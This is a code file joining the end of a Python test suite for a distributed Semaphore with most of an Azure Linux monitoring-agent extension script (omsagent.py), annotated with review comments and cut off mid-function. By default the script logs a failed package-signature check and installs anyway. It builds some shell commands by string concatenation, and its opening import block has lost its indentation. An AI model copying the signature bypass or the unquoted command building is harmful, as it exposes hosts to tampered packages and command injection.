    def test_basic(self):
        sem1 = self.client.Semaphore(self.lockpath)
        sem1.acquire()
        sem1.release()

    def test_lock_one(self):
        sem1 = self.client.Semaphore(self.lockpath, max_leases=1)
        sem2 = self.client.Semaphore(self.lockpath, max_leases=1)
        started = threading.Event()
        event = threading.Event()

        sem1.acquire()

        def sema_one():
            started.set()
            with sem2:
                event.set()

        thread = threading.Thread(target=sema_one, args=())
        thread.start()
        started.wait(10)
        # sem2 must still be blocked while sem1 holds the single lease.
        self.assertFalse(event.is_set())

        sem1.release()
        event.wait(10)
        # NOTE(review): assert_ is a deprecated unittest alias of assertTrue.
        self.assert_(event.is_set())
        thread.join()

    def test_non_blocking(self):
        sem1 = self.client.Semaphore(
            self.lockpath, identifier='sem1', max_leases=2)
        sem2 = self.client.Semaphore(
            self.lockpath, identifier='sem2', max_leases=2)
        sem3 = self.client.Semaphore(
            self.lockpath, identifier='sem3', max_leases=2)

        sem1.acquire()
        sem2.acquire()
        ok_(not sem3.acquire(blocking=False))
        eq_(set(sem1.lease_holders()), set(['sem1', 'sem2']))
        sem2.release()
        # the next line isn't required, but avoids timing issues in tests
        sem3.acquire()
        eq_(set(sem1.lease_holders()), set(['sem1', 'sem3']))
        sem1.release()
        sem3.release()

    def test_non_blocking_release(self):
        sem1 = self.client.Semaphore(
            self.lockpath, identifier='sem1', max_leases=1)
        sem2 = self.client.Semaphore(
            self.lockpath, identifier='sem2', max_leases=1)
        sem1.acquire()
        sem2.acquire(blocking=False)

        # make sure there's no shutdown / cleanup error
        sem1.release()
        sem2.release()

    def test_holders(self):
        started = threading.Event()
        event = threading.Event()

        def sema_one():
            with self.client.Semaphore(self.lockpath, 'fred', max_leases=1):
                started.set()
                event.wait()

        thread = threading.Thread(target=sema_one, args=())
        thread.start()
        started.wait()
        sem1 = self.client.Semaphore(self.lockpath)
        holders = sem1.lease_holders()
        eq_(holders, ['fred'])
        event.set()
        thread.join()

    def test_semaphore_cancel(self):
        sem1 = self.client.Semaphore(self.lockpath, 'fred', max_leases=1)
        sem2 = self.client.Semaphore(self.lockpath, 'george', max_leases=1)
        sem1.acquire()
        started = threading.Event()
        event = threading.Event()

        def sema_one():
            started.set()
            try:
                with sem2:
                    started.set()
            except CancelledError:
                event.set()

        thread = threading.Thread(target=sema_one, args=())
        thread.start()
        started.wait()
        eq_(sem1.lease_holders(), ['fred'])
        eq_(event.is_set(), False)
        sem2.cancel()
        event.wait()
        eq_(event.is_set(), True)
        thread.join()

    def test_multiple_acquire_and_release(self):
        # Re-entrant acquire; a single release drops the lease, a second
        # release reports False.
        sem1 = self.client.Semaphore(self.lockpath, 'fred', max_leases=1)
        sem1.acquire()
        sem1.acquire()

        eq_(True, sem1.release())
        eq_(False, sem1.release())

    def test_handle_session_loss(self):
        expire_semaphore = self.client.Semaphore(self.lockpath, 'fred',
                                                 max_leases=1)

        client = self._get_client()
        client.start()
        lh_semaphore = client.Semaphore(self.lockpath, 'george', max_leases=1)
        lh_semaphore.acquire()

        started = threading.Event()
        event = threading.Event()
        event2 = threading.Event()

        def sema_one():
            started.set()
            with expire_semaphore:
                event.set()
                event2.wait()

        thread = threading.Thread(target=sema_one, args=())
        thread.start()
        started.wait()

        eq_(lh_semaphore.lease_holders(), ['george'])

        # Fired in a separate thread to make sure we can see the effect
        expired = threading.Event()

        def expire():
            self.expire_session()
            expired.set()

        thread = threading.Thread(target=expire, args=())
        thread.start()
        expire_semaphore.wake_event.wait()
        expired.wait()

        lh_semaphore.release()
        client.stop()

        event.wait(5)
        eq_(expire_semaphore.lease_holders(), ['fred'])
        event2.set()
        thread.join()

    def test_inconsistent_max_leases(self):
        sem1 = self.client.Semaphore(self.lockpath, max_leases=1)
        sem2 = self.client.Semaphore(self.lockpath, max_leases=2)

        sem1.acquire()
        # Conflicting max_leases on the same path must be rejected.
        self.assertRaises(ValueError, sem2.acquire)

    def test_inconsistent_max_leases_other_data(self):
        sem1 = self.client.Semaphore(self.lockpath, max_leases=1)
        sem2 = self.client.Semaphore(self.lockpath, max_leases=2)

        self.client.ensure_path(self.lockpath)
        # Unparseable node data: the max_leases check cannot trigger.
        self.client.set(self.lockpath, b'a$')

        sem1.acquire()
        # sem2 thinks it's ok to have two lease holders
        ok_(sem2.acquire(blocking=False))

    def test_reacquire(self):
        lock = self.client.Semaphore(self.lockpath)
        lock.acquire()
        lock.release()
        lock.acquire()
        lock.release()

    def test_acquire_after_cancelled(self):
        lock = self.client.Semaphore(self.lockpath)
        self.assertTrue(lock.acquire())
        self.assertTrue(lock.release())
        lock.cancel()
        self.assertTrue(lock.cancelled)
        # A cancelled semaphore can still be acquired afterwards.
        self.assertTrue(lock.acquire())

    def test_timeout(self):
        timeout = 3
        e = threading.Event()
        started = threading.Event()

        # In the background thread, acquire the lock and wait thrice the time
        # that the main thread is going to wait to acquire the lock.
        sem1 = self.client.Semaphore(self.lockpath, "one")

        def _thread(sem, event, timeout):
            with sem:
                started.set()
                # NOTE(review): Event.isSet() is a deprecated alias of is_set().
                event.wait(timeout)
                if not event.isSet():
                    # Eventually fail to avoid hanging the tests
                    self.fail("sem2 never timed out")

        t = threading.Thread(target=_thread, args=(sem1, e, timeout * 3))
        t.start()

        # Start the main thread's kazoo client and try to acquire the lock
        # but give up after `timeout` seconds
        client2 = self._get_client()
        client2.start()
        started.wait(5)
        self.assertTrue(started.isSet())
        sem2 = client2.Semaphore(self.lockpath, "two")
        try:
            sem2.acquire(timeout=timeout)
        except LockTimeout:
            # A timeout is the behavior we're expecting, since the background
            # thread will still be holding onto the lock
            e.set()
        finally:
            # Cleanup
            t.join()
            client2.stop()
|
omsagent.py | #!/usr/bin/env python
#
# OmsAgentForLinux Extension
#
# Copyright 2015 Microsoft Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import sys
# future imports have no effect on python 3 (verified in official docs)
# importing from source causes import errors on python 3, lets skip import
if sys.version_info[0] < 3:
from future import standard_library
standard_library.install_aliases()
from builtins import str
import os
import os.path
import signal
import pwd
import grp
import re
import traceback
import time
import platform
import subprocess
import json
import base64
import inspect
import urllib.request, urllib.parse, urllib.error
import watcherutil
import shutil
from threading import Thread
try:
from Utils.WAAgentUtil import waagent
import Utils.HandlerUtil as HUtil
except Exception as e:
# These utils have checks around the use of them; this is not an exit case
print('Importing utils failed with error: {0}'.format(e))
# This monkey patch duplicates the one made in the waagent import above.
# It is necessary because on 2.6, the waagent monkey patch appears to be overridden
# by the python-future subprocess.check_output backport.
if sys.version_info < (2,7):
    def check_output(*popenargs, **kwargs):
        r"""Backport from subprocess module from python 2.7"""
        # stdout is always captured here, so the caller must not supply it.
        if 'stdout' in kwargs:
            raise ValueError('stdout argument not allowed, it will be overridden.')
        process = subprocess.Popen(stdout=subprocess.PIPE, *popenargs, **kwargs)
        output, unused_err = process.communicate()
        retcode = process.poll()
        if retcode:
            cmd = kwargs.get("args")
            if cmd is None:
                cmd = popenargs[0]
            raise subprocess.CalledProcessError(retcode, cmd, output=output)
        return output

    # Exception classes used by this module.
    class CalledProcessError(Exception):
        # Mirrors the 2.7 subprocess.CalledProcessError attributes.
        def __init__(self, returncode, cmd, output=None):
            self.returncode = returncode
            self.cmd = cmd
            self.output = output
        def __str__(self):
            return "Command '%s' returned non-zero exit status %d" % (self.cmd, self.returncode)

    # Install the backports onto the subprocess module itself.
    subprocess.check_output = check_output
    subprocess.CalledProcessError = CalledProcessError
# Global Variables
# When True, a failed shell-bundle signature verification is logged but does
# not abort the operation (see main()).
ProceedOnSigningVerificationFailure = True

# Relative directories (under the extension working directory) holding the
# shell bundle and the GPG key material.
PackagesDirectory = 'packages'
keysDirectory = 'keys'
BundleFileName = 'omsagent-1.13.11-0.universal.x64.sh'
GUIDRegex = r'[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}'
GUIDOnlyRegex = r'^' + GUIDRegex + '$'
SCOMCertIssuerRegex = r'^[\s]*Issuer:[\s]*CN=SCX-Certificate/title=SCX' + GUIDRegex + ', DC=.*$'
SCOMPort = 1270
PostOnboardingSleepSeconds = 5
InitialRetrySleepSeconds = 30
# Set by main() when the 'update' operation is requested; consulted by
# uninstall() to decide whether workspace configuration should be kept.
IsUpgrade = False

# Paths
OMSAdminPath = '/opt/microsoft/omsagent/bin/omsadmin.sh'
OMSAgentServiceScript = '/opt/microsoft/omsagent/bin/service_control'
OMIConfigEditorPath = '/opt/omi/bin/omiconfigeditor'
OMIServerConfPath = '/etc/opt/omi/conf/omiserver.conf'
EtcOMSAgentPath = '/etc/opt/microsoft/omsagent/'
VarOMSAgentPath = '/var/opt/microsoft/omsagent/'
SCOMCertPath = '/etc/opt/microsoft/scx/ssl/scx.pem'
ExtensionStateSubdirectory = 'state'

# Commands
# Always use upgrade - will handle install if scx, omi are not installed or upgrade if they are.
InstallCommandTemplate = '{0} --upgrade'
UninstallCommandTemplate = '{0} --remove'
WorkspaceCheckCommand = '{0} -l'.format(OMSAdminPath)
OnboardCommandWithOptionalParams = '{0} -w {1} -s {2} {3}'
RestartOMSAgentServiceCommand = '{0} restart'.format(OMSAgentServiceScript)
DisableOMSAgentServiceCommand = '{0} disable'.format(OMSAgentServiceScript)

# Cloud Environments
PublicCloudName = "AzurePublicCloud"
FairfaxCloudName = "AzureUSGovernmentCloud"
MooncakeCloudName = "AzureChinaCloud"
USNatCloudName = "USNat" # EX
USSecCloudName = "USSec" # RX
DefaultCloudName = PublicCloudName # Fallback
# Maps an IMDS azEnvironment value to the opinsights DNS domain to onboard to.
CloudDomainMap = {
    PublicCloudName: "opinsights.azure.com",
    FairfaxCloudName: "opinsights.azure.us",
    MooncakeCloudName: "opinsights.azure.cn",
    USNatCloudName: "opinsights.azure.eaglex.ic.gov",
    USSecCloudName: "opinsights.azure.microsoft.scloud"
}

# Error codes
DPKGLockedErrorCode = 55 #56, temporary as it excludes from SLA
InstallErrorCurlNotInstalled = 55 #64, temporary as it excludes from SLA
EnableErrorOMSReturned403 = 5
EnableErrorOMSReturnedNon200 = 6
EnableErrorResolvingHost = 7
EnableErrorOnboarding = 8
EnableCalledBeforeSuccessfulInstall = 52 # since install is a missing dependency
UnsupportedOpenSSL = 55 #60, temporary as it excludes from SLA
# OneClick error codes
OneClickErrorCode = 40
ManagedIdentityExtMissingErrorCode = 41
ManagedIdentityExtErrorCode = 42
MetadataAPIErrorCode = 43
OMSServiceOneClickErrorCode = 44
MissingorInvalidParameterErrorCode = 11
UnwantedMultipleConnectionsErrorCode = 10
CannotConnectToOMSErrorCode = 55
UnsupportedOperatingSystem = 51

# Configuration
HUtilObject = None
SettingsSequenceNumber = None
HandlerEnvironment = None
SettingsDict = None

# OneClick Constants
ManagedIdentityExtListeningURLPath = '/var/lib/waagent/ManagedIdentity-Settings'
# NOTE(review): re-declares GUIDRegex from above with the same pattern text
# (as a non-raw string) — equivalent but redundant.
GUIDRegex = '[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}'
OAuthTokenResource = 'https://management.core.windows.net/'
OMSServiceValidationEndpoint = 'https://global.oms.opinsights.azure.com/ManagedIdentityService.svc/Validate'
AutoManagedWorkspaceCreationSleepSeconds = 20

# agent permissions
AgentUser='omsagent'
AgentGroup='omiusers'

# Change permission of log path - if we fail, that is not an exit case
try:
    ext_log_path = '/var/log/azure/'
    if os.path.exists(ext_log_path):
        # 700 is interpolated into the shell command as the chmod mode string.
        os.system('chmod {1} {0}'.format(ext_log_path, 700))
except:
    pass
"""
What need to be packaged to make the signing work:
keys
dscgpgkey.asc
msgpgkey.asc
packages
omsagent-*.universal.x64.asc
omsagent-*.universal.x64.sha256sums
"""
def verifyShellBundleSigningAndChecksum():
    """Verify the GPG signature and SHA256 checksums of the shell bundle.

    Raises:
        Exception: when a required file is missing or a verification step
            returns a non-zero exit code.
    """
    cert_directory = os.path.join(os.getcwd(), PackagesDirectory)
    keys_directory = os.path.join(os.getcwd(), keysDirectory)

    # import GPG key
    dscGPGKeyFilePath = os.path.join(keys_directory, 'dscgpgkey.asc')
    if not os.path.isfile(dscGPGKeyFilePath):
        raise Exception("Unable to find the dscgpgkey.asc file at " + dscGPGKeyFilePath)
    importGPGKeyCommand = "sh ImportGPGkey.sh " + dscGPGKeyFilePath
    # NOTE(review): the import's exit code is not checked here; a failed
    # import surfaces later as a signature-verification failure.
    exit_code, output = run_command_with_retries_output(importGPGKeyCommand, retries = 0, retry_check = retry_skip, check_error = False)

    # Check that we can find the keyring file
    keyringFilePath = os.path.join(keys_directory, 'keyring.gpg')
    if not os.path.isfile(keyringFilePath):
        raise Exception("Unable to find the Extension keyring file at " + keyringFilePath)

    # Check that we can find the asc file
    bundleFileName, file_ext = os.path.splitext(BundleFileName)
    ascFilePath = os.path.join(cert_directory, bundleFileName + ".asc")
    if not os.path.isfile(ascFilePath):
        raise Exception("Unable to find the OMS shell bundle asc file at " + ascFilePath)

    # check that we can find the SHA256 sums file
    sha256SumsFilePath = os.path.join(cert_directory, bundleFileName + ".sha256sums")
    if not os.path.isfile(sha256SumsFilePath):
        raise Exception("Unable to find the OMS shell bundle SHA256 sums file at " + sha256SumsFilePath)

    # Verify the SHA256 sums file with the keyring and asc files
    # NOTE(review): HOME is set to the *relative* 'keys' directory rather than
    # the absolute keys_directory computed above — confirm this is intentional.
    verifySha256SumsCommand = "HOME=" + keysDirectory + " gpg --no-default-keyring --keyring " + keyringFilePath + " --verify " + ascFilePath + " " + sha256SumsFilePath
    exit_code, output = run_command_with_retries_output(verifySha256SumsCommand, retries = 0, retry_check = retry_skip, check_error = False)
    if exit_code != 0:
        raise Exception("Failed to verify SHA256 sums file at " + sha256SumsFilePath)

    # Perform SHA256 sums to verify shell bundle
    hutil_log_info("Perform SHA256 sums to verify shell bundle")
    performSha256SumsCommand = "cd %s; sha256sum -c %s" % (cert_directory, sha256SumsFilePath)
    exit_code, output = run_command_with_retries_output(performSha256SumsCommand, retries = 0, retry_check = retry_skip, check_error = False)
    if exit_code != 0:
        raise Exception("Failed to verify shell bundle with the SHA256 sums file at " + sha256SumsFilePath)
def main():
    """
    Main method
    Parse out operation from argument, invoke the operation, and finish.

    Fixes over the previous revision:
    - int comparisons now use ==/!= instead of `is`/`is not` (identity on
      ints is a CPython detail and a SyntaxWarning on 3.8+);
    - `ex.message` replaced by `str(ex)` (Exception.message was removed in
      Python 3);
    - the failure branch of signing verification now passes an exit code to
      log_and_exit (the old call dropped it and would raise TypeError).
    """
    init_waagent_logger()
    waagent_log_info('OmsAgentForLinux started to handle.')
    global IsUpgrade

    # Determine the operation being executed
    operation = None
    try:
        option = sys.argv[1]
        if re.match('^([-/]*)(disable)', option):
            operation = 'Disable'
        elif re.match('^([-/]*)(uninstall)', option):
            operation = 'Uninstall'
        elif re.match('^([-/]*)(install)', option):
            operation = 'Install'
        elif re.match('^([-/]*)(enable)', option):
            operation = 'Enable'
        elif re.match('^([-/]*)(update)', option):
            operation = 'Update'
            IsUpgrade = True
        elif re.match('^([-/]*)(telemetry)', option):
            operation = 'Telemetry'
    except Exception as e:
        waagent_log_error(str(e))

    if operation is None:
        log_and_exit('Unknown', 1, 'No valid operation provided')

    # Set up for exit code and any error messages
    exit_code = 0
    message = '{0} succeeded'.format(operation)

    # Clean status file to mitigate diskspace issues on small VMs
    status_files = [
        "/var/opt/microsoft/omsconfig/status/dscperformconsistency",
        "/var/opt/microsoft/omsconfig/status/dscperforminventory",
        "/var/opt/microsoft/omsconfig/status/dscsetlcm",
        "/var/opt/microsoft/omsconfig/status/omsconfighost"
    ]
    for sf in status_files:
        if os.path.isfile(sf):
            if sf.startswith("/var/opt/microsoft/omsconfig/status"):
                try:
                    os.remove(sf)
                except Exception as e:
                    hutil_log_info('Error removing telemetry status file before installation: {0}'.format(sf))
                    hutil_log_info('Exception info: {0}'.format(traceback.format_exc()))

    exit_code = check_disk_space_availability()
    if exit_code != 0:
        message = '{0} failed due to low disk space'.format(operation)
        log_and_exit(operation, exit_code, message)

    # Invoke operation
    try:
        global HUtilObject
        HUtilObject = parse_context(operation)

        # Verify shell bundle signing
        try:
            hutil_log_info("Start signing verification")
            verifyShellBundleSigningAndChecksum()
            hutil_log_info("ShellBundle signing verification succeeded")
        except Exception as ex:
            errmsg = "ShellBundle signing verification failed with '%s'" % str(ex)
            if ProceedOnSigningVerificationFailure:
                hutil_log_error(errmsg)
            else:
                log_and_exit(operation, 1, errmsg)

        # invoke operation
        exit_code, output = operations[operation]()

        # Exit code 1 indicates a general problem that doesn't have a more
        # specific error code; it often indicates a missing dependency
        if exit_code == 1 and operation == 'Install':
            message = 'Install failed with exit code 1. Please check that ' \
                      'dependencies are installed. For details, check logs ' \
                      'in /var/log/azure/Microsoft.EnterpriseCloud.' \
                      'Monitoring.OmsAgentForLinux'
        elif exit_code == 127 and operation == 'Install':
            # happens if shell bundle couldn't be extracted due to low space or missing dependency
            exit_code = 52 # since it is a missing dependency
            message = 'Install failed with exit code 127. Please check that ' \
                      'dependencies are installed. For details, check logs ' \
                      'in /var/log/azure/Microsoft.EnterpriseCloud.' \
                      'Monitoring.OmsAgentForLinux'
        elif exit_code == DPKGLockedErrorCode and operation == 'Install':
            message = 'Install failed with exit code {0} because the ' \
                      'package manager on the VM is currently locked: ' \
                      'please wait and try again'.format(DPKGLockedErrorCode)
        elif exit_code != 0:
            message = '{0} failed with exit code {1} {2}'.format(operation,
                                                                 exit_code, output)
    except OmsAgentForLinuxException as e:
        exit_code = e.error_code
        message = e.get_error_message(operation)
    except Exception as e:
        exit_code = 1
        message = '{0} failed with error: {1}\n' \
                  'Stacktrace: {2}'.format(operation, e,
                                           traceback.format_exc())

    # Finish up and log messages
    log_and_exit(operation, exit_code, message)
def check_disk_space_availability():
    """
    Check if there is the required space on the machine.

    Returns 52 (the missing-dependency exit code) when any of /var, /etc or
    /opt has less than 500 MB free, and 0 otherwise. Any failure to measure
    disk space is treated as "enough space" so a broken probe never blocks
    the extension.
    """
    try:
        if get_free_space_mb("/var") < 500 or get_free_space_mb("/etc") < 500 or get_free_space_mb("/opt") < 500:
            # 52 is the exit code for missing dependency i.e. disk space
            # https://github.com/Azure/azure-marketplace/wiki/Extension-Build-Notes-Best-Practices#error-codes-and-messages-output-to-stderr
            return 52
        else:
            return 0
    except Exception:
        # Narrowed from a bare except: still best-effort, but no longer
        # swallows SystemExit/KeyboardInterrupt.
        print('Failed to check disk usage.')
        return 0
def get_free_space_mb(dirname):
    """Return the free disk space, in whole MiB, of the filesystem
    containing *dirname*."""
    stats = os.statvfs(dirname)
    free_bytes = stats.f_bavail * stats.f_frsize
    return free_bytes // (1024 * 1024)
def stop_telemetry_process():
    """Kill any previously started telemetry watcher and remove its pid file.

    Only pids whose /proc/<pid>/cmdline mentions both 'omsagent.py' and
    '-telemetry' are killed, so a recycled pid belonging to another process
    is never targeted.
    """
    pids_filepath = os.path.join(os.getcwd(),'omstelemetry.pid')

    # kill existing telemetry watcher
    if os.path.exists(pids_filepath):
        with open(pids_filepath, "r") as f:
            for pid in f.readlines():
                # Verify the pid actually belongs to omsagent.
                cmd_file = os.path.join("/proc", str(pid.strip("\n")), "cmdline")
                if os.path.exists(cmd_file):
                    with open(cmd_file, "r") as pidf:
                        cmdline = pidf.readlines()
                        if cmdline[0].find("omsagent.py") >= 0 and cmdline[0].find("-telemetry") >= 0:
                            # pid still carries its trailing newline; the
                            # shell tolerates it.
                            kill_cmd = "kill " + pid
                            run_command_and_log(kill_cmd)
        run_command_and_log("rm "+pids_filepath)
def start_telemetry_process():
    """
    Start telemetry process that performs periodic monitoring activities
    :return: None
    """
    # Make sure at most one watcher is running.
    stop_telemetry_process()

    #start telemetry watcher
    omsagent_filepath = os.path.join(os.getcwd(),'omsagent.py')
    args = ['python{0}'.format(sys.version_info[0]), omsagent_filepath, '-telemetry']
    # NOTE: the log handle is deliberately left open — it backs the detached
    # child's stdout/stderr for the child's lifetime.
    log = open(os.path.join(os.getcwd(), 'daemon.log'), 'w')
    hutil_log_info('start watcher process '+str(args))
    subprocess.Popen(args, stdout=log, stderr=log)
def telemetry():
    """Run the telemetry watcher loop in the current process.

    Writes this process's pid to omstelemetry.pid so a later invocation can
    stop it, then starts and joins the watcher threads.

    Returns:
        (0, "") — the (exit_code, output) pair expected by main().
    """
    pids_filepath = os.path.join(os.getcwd(), 'omstelemetry.pid')
    py_pid = os.getpid()
    with open(pids_filepath, 'w') as f:
        f.write(str(py_pid) + '\n')

    # HUtilObject is None when the handler utilities failed to import; in
    # that case there is nothing to watch.
    if HUtilObject is not None:
        watcher = watcherutil.Watcher(HUtilObject.error, HUtilObject.log)
        watcher_thread = Thread(target = watcher.watch)
        self_mon_thread = Thread(target = watcher.monitor_health)
        watcher_thread.start()
        self_mon_thread.start()
        # Both threads run until the watcher terminates.
        watcher_thread.join()
        self_mon_thread.join()

    return 0, ""
def prepare_update():
    """Back up the workspace configuration directory ahead of an upgrade.

    Moves /etc/opt/microsoft/omsagent/<workspace> into the extension's
    'state' subdirectory, unless a backup already exists there.

    Returns:
        (0, "") — the (exit_code, output) pair expected by main().
    """
    # If a backup was already created for this workspace (with all of its
    # files), there is nothing left to move.
    settings, _ = get_settings()
    workspace = settings.get('workspaceId')
    source_dir = os.path.join(EtcOMSAgentPath, workspace)
    backup_dir = os.path.join(EtcOMSAgentPath, ExtensionStateSubdirectory, workspace)
    if not os.path.isdir(backup_dir):
        shutil.move(source_dir, backup_dir)
    return 0, ""
def restore_state(workspaceId):
    """Move a previously backed-up workspace state directory back to its
    expected location, when the backup exists and the target does not.

    Failures are logged and swallowed — restoring state is best-effort.
    """
    try:
        backup_dir = os.path.join(EtcOMSAgentPath, ExtensionStateSubdirectory, workspaceId)
        target_dir = os.path.join(EtcOMSAgentPath, workspaceId)
        restorable = os.path.isdir(backup_dir) and not os.path.isdir(target_dir)
        if restorable:
            shutil.move(backup_dir, target_dir)
    except Exception as e:
        hutil_log_error("Error while restoring the state. Exception : "+traceback.format_exc())
def install():
    """
    Ensure that this VM distro and version are supported.
    Install the OMSAgent shell bundle, using retries.
    Note: install operation times out from WAAgent at 15 minutes, so do not
    wait longer.
    """
    exit_if_vm_not_supported('Install')

    public_settings, protected_settings = get_settings()
    if public_settings is None:
        raise ParameterMissingException('Public configuration must be ' \
                                        'provided')
    workspaceId = public_settings.get('workspaceId')
    check_workspace_id(workspaceId)

    # Take the backup of the state for given workspace.
    restore_state(workspaceId)

    # In the case where a SCOM connection is already present, we should not
    # create conflicts by installing the OMSAgent packages
    stopOnMultipleConnections = public_settings.get('stopOnMultipleConnections')
    if (stopOnMultipleConnections is not None
            and stopOnMultipleConnections is True):
        detect_multiple_connections(workspaceId)

    package_directory = os.path.join(os.getcwd(), PackagesDirectory)
    bundle_path = os.path.join(package_directory, BundleFileName)

    # NOTE(review): 100 is a *decimal* mode (0o144), not octal 0o100/0o755 —
    # confirm the intended permission bits; the extension runs as root, so
    # exec still works despite the unusual mode.
    os.chmod(bundle_path, 100)
    cmd = InstallCommandTemplate.format(bundle_path)
    hutil_log_info('Running command "{0}"'.format(cmd))

    # Retry, since install can fail due to concurrent package operations
    exit_code, output = run_command_with_retries_output(cmd, retries = 15,
                                                        retry_check = retry_if_dpkg_locked_or_curl_is_not_found,
                                                        final_check = final_check_if_dpkg_locked)
    return exit_code, output
def check_kill_process(pstring):
    """Send SIGKILL to every running process whose `ps` listing matches
    *pstring* (the grep pipeline excludes the grep itself)."""
    matching = os.popen("ps ax | grep " + pstring + " | grep -v grep")
    for entry in matching:
        pid = int(entry.split()[0])
        os.kill(pid, signal.SIGKILL)
def uninstall():
    """
    Uninstall the OMSAgent shell bundle.
    This is a somewhat soft uninstall. It is not a purge.
    Note: uninstall operation times out from WAAgent at 5 minutes

    Fix over the previous revision: the exception branches set exit_code but
    never set `output`, so the final `return exit_code, output` raised
    UnboundLocalError; the (previously unused) failure message is now
    returned as the output.
    """
    package_directory = os.path.join(os.getcwd(), PackagesDirectory)
    bundle_path = os.path.join(package_directory, BundleFileName)
    global IsUpgrade

    os.chmod(bundle_path, 100)
    cmd = UninstallCommandTemplate.format(bundle_path)
    hutil_log_info('Running command "{0}"'.format(cmd))

    # Retry, since uninstall can fail due to concurrent package operations
    try:
        exit_code, output = run_command_with_retries_output(cmd, retries = 5,
                                                            retry_check = retry_if_dpkg_locked_or_curl_is_not_found,
                                                            final_check = final_check_if_dpkg_locked)
    except Exception as e:
        # try to force clean the installation
        try:
            check_kill_process("omsagent")
            exit_code = 0
            output = ''
        except Exception as ex:
            exit_code = 1
            output = 'Uninstall failed with error: {0}\n' \
                     'Stacktrace: {1}'.format(ex, traceback.format_exc())

    # Keep the workspace configuration across an upgrade; purge it on a
    # genuine removal.
    if IsUpgrade:
        IsUpgrade = False
    else:
        remove_workspace_configuration()

    return exit_code, output
def enable():
    """
    Onboard the OMSAgent to the specified OMS workspace.
    This includes enabling the OMS process on the VM.
    This call will return non-zero or throw an exception if
    the settings provided are incomplete or incorrect.
    Note: enable operation times out from WAAgent at 5 minutes

    Fixes over the previous revision: `exit_code is 0` replaced by `== 0`
    (int identity is a CPython detail and a SyntaxWarning on 3.8+); the bare
    `except:` around the permission fixup narrowed to `except Exception:`.
    """
    exit_if_vm_not_supported('Enable')

    public_settings, protected_settings = get_settings()
    if public_settings is None:
        raise ParameterMissingException('Public configuration must be ' \
                                        'provided')
    if protected_settings is None:
        raise ParameterMissingException('Private configuration must be ' \
                                        'provided')

    vmResourceId = protected_settings.get('vmResourceId')
    # If vmResourceId is not provided in private settings, get it from metadata API
    if vmResourceId is None or not vmResourceId:
        vmResourceId = get_vmresourceid_from_metadata()
        hutil_log_info('vmResourceId from Metadata API is {0}'.format(vmResourceId))
    if vmResourceId is None:
        hutil_log_info('This may be a classic VM')

    enableAutomaticManagement = public_settings.get('enableAutomaticManagement')
    if (enableAutomaticManagement is not None
            and enableAutomaticManagement is True):
        hutil_log_info('enableAutomaticManagement is set to true; the ' \
                       'workspace ID and key will be determined by the OMS ' \
                       'service.')
        workspaceInfo = retrieve_managed_workspace(vmResourceId)
        if (workspaceInfo is None or 'WorkspaceId' not in workspaceInfo
                or 'WorkspaceKey' not in workspaceInfo):
            raise OneClickException('Workspace info was not determined')
        else:
            # Note: do NOT log workspace keys!
            hutil_log_info('Managed workspaceInfo has been retrieved')
            workspaceId = workspaceInfo['WorkspaceId']
            workspaceKey = workspaceInfo['WorkspaceKey']
            try:
                check_workspace_id_and_key(workspaceId, workspaceKey)
            except InvalidParameterError as e:
                raise OMSServiceOneClickException('Received invalid ' \
                                                  'workspace info: ' \
                                                  '{0}'.format(e))
    else:
        workspaceId = public_settings.get('workspaceId')
        workspaceKey = protected_settings.get('workspaceKey')
        check_workspace_id_and_key(workspaceId, workspaceKey)

    # Check if omsadmin script is available
    if not os.path.exists(OMSAdminPath):
        log_and_exit('Enable', EnableCalledBeforeSuccessfulInstall,
                     'OMSAgent onboarding script {0} does not exist. Enable ' \
                     'cannot be called before install.'.format(OMSAdminPath))

    vmResourceIdParam = '-a {0}'.format(vmResourceId)

    proxy = protected_settings.get('proxy')
    proxyParam = ''
    if proxy is not None:
        proxyParam = '-p {0}'.format(proxy)

    # get domain from protected settings
    domain = protected_settings.get('domain')
    if domain is None:
        # detect opinsights domain using IMDS
        domain = get_azure_cloud_domain()
    else:
        hutil_log_info("Domain retrieved from protected settings '{0}'".format(domain))
    domainParam = ''
    if domain:
        domainParam = '-d {0}'.format(domain)

    optionalParams = '{0} {1} {2}'.format(domainParam, proxyParam, vmResourceIdParam)
    onboard_cmd = OnboardCommandWithOptionalParams.format(OMSAdminPath,
                                                          workspaceId,
                                                          workspaceKey,
                                                          optionalParams)

    hutil_log_info('Handler initiating onboarding.')
    # log_cmd=False: the command line contains the workspace key.
    exit_code, output = run_command_with_retries_output(onboard_cmd, retries = 5,
                                                        retry_check = retry_onboarding,
                                                        final_check = raise_if_no_internet,
                                                        check_error = True, log_cmd = False)

    # now ensure the permissions and ownership is set recursively
    try:
        workspaceId = public_settings.get('workspaceId')
        etc_final_path = os.path.join(EtcOMSAgentPath, workspaceId)
        if (os.path.isdir(etc_final_path)):
            uid = pwd.getpwnam(AgentUser).pw_uid
            gid = grp.getgrnam(AgentGroup).gr_gid
            os.chown(etc_final_path, uid, gid)
            os.system('chmod {1} {0}'.format(etc_final_path, 750))
            for root, dirs, files in os.walk(etc_final_path):
                for d in dirs:
                    os.chown(os.path.join(root, d), uid, gid)
                    os.system('chmod {1} {0}'.format(os.path.join(root, d), 750))
                for f in files:
                    os.chown(os.path.join(root, f), uid, gid)
                    os.system('chmod {1} {0}'.format(os.path.join(root, f), 640))
    except Exception:
        # Permission fixup is best-effort; narrowed from a bare except.
        hutil_log_info('Failed to set permissions for OMS directories, could potentially have issues uploading.')

    if exit_code == 0:
        # Create a marker file to denote the workspace that was
        # onboarded using the extension. This will allow supporting
        # multi-homing through the extension like Windows does
        extension_marker_path = os.path.join(EtcOMSAgentPath, workspaceId,
                                             'conf/.azure_extension_marker')
        if os.path.exists(extension_marker_path):
            hutil_log_info('Extension marker file {0} already ' \
                           'created'.format(extension_marker_path))
        else:
            try:
                open(extension_marker_path, 'w').close()
                hutil_log_info('Created extension marker file ' \
                               '{0}'.format(extension_marker_path))
            except IOError as e:
                try:
